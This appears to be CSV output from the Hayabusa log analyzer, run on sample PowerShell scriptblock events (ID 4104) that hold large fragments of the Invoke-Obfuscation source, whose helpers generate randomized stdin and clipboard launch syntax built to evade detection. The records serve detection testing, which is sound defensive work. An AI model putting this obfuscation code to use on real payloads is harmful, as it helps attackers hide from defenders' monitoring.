None .DESCRIPTION Out-RandomPowerShellStdInInvokeSyntax generates random PowerShell syntax for invoking a command passed to powershell.exe via standard input. 
This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent process if passed to powershell.exe via standard input. .EXAMPLE C:\PS> Out-RandomPowerShellStdInInvokeSyntax ( ^& ('v'+( 'aR'+ 'Iabl' ) + 'E' ) ('exE'+'CUTiOnco' +'n'+ 'TeX' + 't' ) -Val).\""INvOKec`oMm`A`ND\"".\""invO`K`es`CRiPt\""(${I`N`puT} ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via standard input for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Build out random PowerShell stdin syntax like: # | powershell - <-- default to this if $NoExit flag is defined because this will cause an error for the other options # | powershell IEX $Input # | powershell $ExecutionContext.InvokeCommand.InvokeScript($Input) # Also including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = (Get-Random -Input $ExecContextVariables) $RandomInputVariable = (Get-Random -Input @('$Input','${Input}')) # Generate random invoke operation syntax. 
# 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $RandomInputVariable If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # If $NoExit flag is defined in calling function then default to - stdin syntax. It will cause errors for other syntax options. If($NoExit) { $InvokeOption = '-' } # Set $PowerShellStdIn to value of $InvokeOption. $PowerShellStdIn = $InvokeOption # Random case of $PowerShellStdIn. $PowerShellStdIn = ([Char[]]$PowerShellStdIn.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random PowerShell Stdin operation through the appropriate token obfuscators. If($PowerShellStdIn -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $PowerShellStdIn syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. 
This will handle single-escaped and not-escaped characters. If($PowerShellStdIn.Contains(""$Char"")) { $PowerShellStdIn = $PowerShellStdIn.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellStdIn.Contains('""')) { $PowerShellStdIn = $PowerShellStdIn.Replace('""','\""') } Return $PowerShellStdIn } Function Out-RandomClipboardInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command stored in the clipboard. Invoke-Obfuscation Function: Out-RandomClipboardInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomClipboardInvokeSyntax generates random PowerShell syntax for invoking a command stored in the clipboard. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent/grandparent process if passed to powershell.exe via clipboard. .EXAMPLE C:\PS> Out-RandomClipboardInvokeSyntax . ( \""{0}{1}\"" -f( \""{1}{0}\""-f 'p','Add-Ty' ),'e' ) -AssemblyName ( \""{1}{0}{3}{2}\""-f ( \""{2}{0}{3}{1}\""-f'Wi','dows.Fo','em.','n'),(\""{1}{0}\""-f 'yst','S'),'s','rm' ) ; (.( \""{0}\"" -f'GV' ) (\""{2}{3}{1}{0}{4}\"" -f 'E','onCoNT','EXEC','UTi','XT')).\""Va`LuE\"".\""inVOK`Ec`OMmANd\"".\""inVOKe`SC`RIpT\""(( [sYsTEM.WInDOwS.foRMS.ClIPbOard]::( \""{1}{0}\""-f (\""{2}{1}{0}\"" -f'XT','tTE','e'),'g').Invoke( ) ) ) ;[System.Windows.Forms.Clipboard]::( \""{1}{0}\""-f'ar','Cle' ).Invoke( ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via clipboard for command line obfuscation benefits. 
This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set variables necessary for loading appropriate class/type to be able to interact with the clipboard. $ReflectionAssembly = Get-Random -Input @('System.Reflection.Assembly','Reflection.Assembly') $WindowsClipboard = Get-Random -Input @('Windows.Clipboard','System.Windows.Clipboard') $WindowsFormsClipboard = Get-Random -Input @('System.Windows.Forms.Clipboard','Windows.Forms.Clipboard') # Randomly select flag argument substring for Add-Type -AssemblyCore. $FullArgument = ""-AssemblyName"" # Take into account the shorted flag of -AN as well. $AssemblyNameFlags = @() $AssemblyNameFlags += '-AN' For($Index=2; $Index -le $FullArgument.Length; $Index++) { $AssemblyNameFlags += $FullArgument.SubString(0,$Index) } $AssemblyNameFlag = Get-Random -Input $AssemblyNameFlags # Characters we will use to generate random variable name. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate random variable name. $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate paired random syntax options for: A) loading necessary class/assembly, B) retrieving contents from clipboard, and C) clearing/overwritting clipboard contents. 
$RandomClipSyntaxValue = Get-Random -Input @(1..3) Switch($RandomClipSyntaxValue) { 1 {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag PresentationCore"" $GetClipboardContentsOption = ""([$WindowsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 2 { $LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag System.Windows.Forms"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 3 { $LoadClipboardClassOption = (Get-Random -Input @('[Void]','$NULL=',""`$$RandomVarName="")) + ""[$ReflectionAssembly]::LoadWithPartialName('System.Windows.Forms')"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } default {Write-Error ""An invalid RandomClipSyntaxValue value ($RandomClipSyntaxValue) was passed to switch block for Out-RandomClipboardInvokeSyntax.""; Exit;} } # Generate syntax options for invoking clipboard contents, including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. 
$ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetClipboardContentsOption If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Set final syntax for invoking clipboard contents. $PowerShellClip = $LoadClipboardClassOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption # Add syntax for clearing clipboard contents. 
$PowerShellClip = $PowerShellClip + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ClearClipboardOption # Run through all relevant token obfuscation functions except Type since it causes error for direct type casting relevant classes in a non-interactive PowerShell session. $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Command' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'CommandArgument' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Variable' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'String' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'RandomWhitespace' # For obfuscated commands generated for $PowerShellClip syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. 
If($PowerShellClip.Contains('""')) { $PowerShellClip = $PowerShellClip.Replace('""','\""') } Return $PowerShellClip }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag PresentationCore"" $GetClipboardContentsOption = ""([$WindowsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 2 { $LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag System.Windows.Forms"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 3 { $LoadClipboardClassOption = (Get-Random -Input @('[Void]','$NULL=',""`$$RandomVarName="")) + ""[$ReflectionAssembly]::LoadWithPartialName('System.Windows.Forms')"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } default {Write-Error ""An invalid RandomClipSyntaxValue value ($RandomClipSyntaxValue) was passed to switch block for Out-RandomClipboardInvokeSyntax.""; Exit;} } # Generate syntax options for invoking clipboard contents, including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. 
$ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetClipboardContentsOption If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Set final syntax for invoking clipboard contents. $PowerShellClip = $LoadClipboardClassOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption # Add syntax for clearing clipboard contents. 
$PowerShellClip = $PowerShellClip + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ClearClipboardOption # Run through all relevant token obfuscation functions except Type since it causes error for direct type casting relevant classes in a non-interactive PowerShell session. $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Command' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'CommandArgument' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Variable' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'String' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'RandomWhitespace' # For obfuscated commands generated for $PowerShellClip syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellClip.Contains('""')) { $PowerShellClip = $PowerShellClip.Replace('""','\""') } Return $PowerShellClip }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Invoke-Obfuscation { <# .SYNOPSIS Master function that orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents. Interactive mode enables one to explore all available obfuscation functions and apply them incrementally to input PowerShell script block or script path contents. Invoke-Obfuscation Function: Invoke-Obfuscation Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Show-AsciiArt, Show-HelpMenu, Show-Menu, Show-OptionsMenu, Show-Tutorial and Out-ScriptContents (all located in Invoke-Obfuscation.ps1) Optional Dependencies: None .DESCRIPTION Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments and common parent-child process relationships. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER ScriptPath Specifies the path to your payload (can be local file, UNC-path, or remote URI). .PARAMETER Command Specifies the obfuscation commands to run against the input ScriptBlock or ScriptPath parameter. 
.PARAMETER NoExit (Optional - only works if Command is specified) Outputs the option to not exit after running obfuscation commands defined in Command parameter. .PARAMETER Quiet (Optional - only works if Command is specified) Outputs the option to output only the final obfuscated result via stdout. .EXAMPLE C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -Quiet C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit -Quiet .NOTES Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [String] $ScriptPath, [String] $Command, [Switch] $NoExit, [Switch] $Quiet ) # Define variables for CLI functionality. $Script:CliCommands = @() $Script:CompoundCommand = @() $Script:QuietWasSpecified = $FALSE $CliWasSpecified = $FALSE $NoExitWasSpecified = $FALSE # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['ScriptBlock']) { $Script:CliCommands += ('set scriptblock ' + [String]$ScriptBlock) } If($PSBoundParameters['ScriptPath']) { $Script:CliCommands += ('set scriptpath ' + $ScriptPath) } # Append Command to CliCommands if specified by user input. If($PSBoundParameters['Command']) { $Script:CliCommands += $Command.Split(',') $CliWasSpecified = $TRUE If($PSBoundParameters['NoExit']) { $NoExitWasSpecified = $TRUE } If($PSBoundParameters['Quiet']) { # Create empty Write-Host and Start-Sleep proxy functions to cause any Write-Host or Start-Sleep invocations to not do anything until non-interactive -Command values are finished being processed. Function Write-Host {} Function Start-Sleep {} $Script:QuietWasSpecified = $TRUE } } ######################################## ## Script-wide variable instantiation ## ######################################## # Script-level array of Show Options menu, set as SCRIPT-level so it can be set from within any of the functions. # Build out menu for Show Options selection from user in Show-OptionsMenu menu. 
$Script:ScriptPath = '' $Script:ScriptBlock = '' $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:ObfuscatedCommand = '' $Script:ObfuscatedCommandHistory = @() $Script:ObfuscationLength = '' $Script:OptionsMenu = @() $Script:OptionsMenu += , @('ScriptPath ' , $Script:ScriptPath , $TRUE) $Script:OptionsMenu += , @('ScriptBlock' , $Script:ScriptBlock , $TRUE) $Script:OptionsMenu += , @('CommandLineSyntax' , $Script:CliSyntax , $FALSE) $Script:OptionsMenu += , @('ExecutionCommands' , $Script:ExecutionCommands, $FALSE) $Script:OptionsMenu += , @('ObfuscatedCommand' , $Script:ObfuscatedCommand, $FALSE) $Script:OptionsMenu += , @('ObfuscationLength' , $Script:ObfuscatedCommand, $FALSE) # Build out $SetInputOptions from above items set as $TRUE (as settable). $SettableInputOptions = @() ForEach($Option in $Script:OptionsMenu) { If($Option[2]) {$SettableInputOptions += ([String]$Option[0]).ToLower().Trim()} } # Script-level variable for whether LAUNCHER has been applied to current ObfuscatedToken. $Script:LauncherApplied = $FALSE # Ensure Invoke-Obfuscation module was properly imported before continuing. If(!(Get-Module Invoke-Obfuscation | Where-Object {$_.ModuleType -eq 'Manifest'})) { $PathTopsd1 = ""$ScriptDir\Invoke-Obfuscation.psd1"" If($PathTopsd1.Contains(' ')) {$PathTopsd1 = '""' + $PathTopsd1 + '""'} Write-Host ""`n`nERROR: Invoke-Obfuscation module is not loaded. You must run:"" -ForegroundColor Red Write-Host "" Import-Module $PathTopsd1`n`n"" -ForegroundColor Yellow Exit } # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 # Build interactive menus. $LineSpacing = '[*] ' # Main Menu. 
$MenuLevel = @() $MenuLevel+= , @($LineSpacing, 'TOKEN' , 'Obfuscate PowerShell command ') $MenuLevel+= , @($LineSpacing, 'STRING' , 'Obfuscate entire command as a ') $MenuLevel+= , @($LineSpacing, 'ENCODING' , 'Obfuscate entire command via ') $MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfuscate command args w/ techniques (run once at end)') # Main\Token Menu. $MenuLevel_Token = @() $MenuLevel_Token += , @($LineSpacing, 'STRING' , 'Obfuscate tokens (suggested to run first)') $MenuLevel_Token += , @($LineSpacing, 'COMMAND' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'ARGUMENT' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'MEMBER' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'VARIABLE' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'TYPE ' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'COMMENT' , 'Remove all tokens') $MenuLevel_Token += , @($LineSpacing, 'WHITESPACE' , 'Insert random (suggested to run last)') $MenuLevel_Token += , @($LineSpacing, 'ALL ' , 'Select choices from above (random order)') $MenuLevel_Token_String = @() $MenuLevel_Token_String += , @($LineSpacing, '1' , ""Concatenate --> e.g. <('co'+'ffe'+'e')>"" , @('Out-ObfuscatedTokenCommand', 'String', 1)) $MenuLevel_Token_String += , @($LineSpacing, '2' , ""Reorder --> e.g. <('{1}{0}'-f'ffee','co')>"" , @('Out-ObfuscatedTokenCommand', 'String', 2)) $MenuLevel_Token_Command = @() $MenuLevel_Token_Command += , @($LineSpacing, '1' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Command', 1)) $MenuLevel_Token_Command += , @($LineSpacing, '2' , ""Splatting + Concatenate --> e.g. <&('Ne'+'w-Ob'+'ject')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 2)) $MenuLevel_Token_Command += , @($LineSpacing, '3' , ""Splatting + Reorder --> e.g. <&('{1}{0}'-f'bject','New-O')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 3)) $MenuLevel_Token_Argument = @() $MenuLevel_Token_Argument += , @($LineSpacing, '1' , 'Random Case --> e.g. 
' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 1)) $MenuLevel_Token_Argument += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 2)) $MenuLevel_Token_Argument += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('Ne'+'t.We'+'bClient')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 3)) $MenuLevel_Token_Argument += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'bClient','Net.We')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 4)) $MenuLevel_Token_Member = @() $MenuLevel_Token_Member += , @($LineSpacing, '1' , 'Random Case --> e.g. '",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Invoke-Obfuscation { <# .SYNOPSIS Master function that orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents. Interactive mode enables one to explore all available obfuscation functions and apply them incrementally to input PowerShell script block or script path contents. 
Invoke-Obfuscation Function: Invoke-Obfuscation Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Show-AsciiArt, Show-HelpMenu, Show-Menu, Show-OptionsMenu, Show-Tutorial and Out-ScriptContents (all located in Invoke-Obfuscation.ps1) Optional Dependencies: None .DESCRIPTION Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments and common parent-child process relationships. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER ScriptPath Specifies the path to your payload (can be local file, UNC-path, or remote URI). .PARAMETER Command Specifies the obfuscation commands to run against the input ScriptBlock or ScriptPath parameter. .PARAMETER NoExit (Optional - only works if Command is specified) Outputs the option to not exit after running obfuscation commands defined in Command parameter. .PARAMETER Quiet (Optional - only works if Command is specified) Outputs the option to output only the final obfuscated result via stdout. .EXAMPLE C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
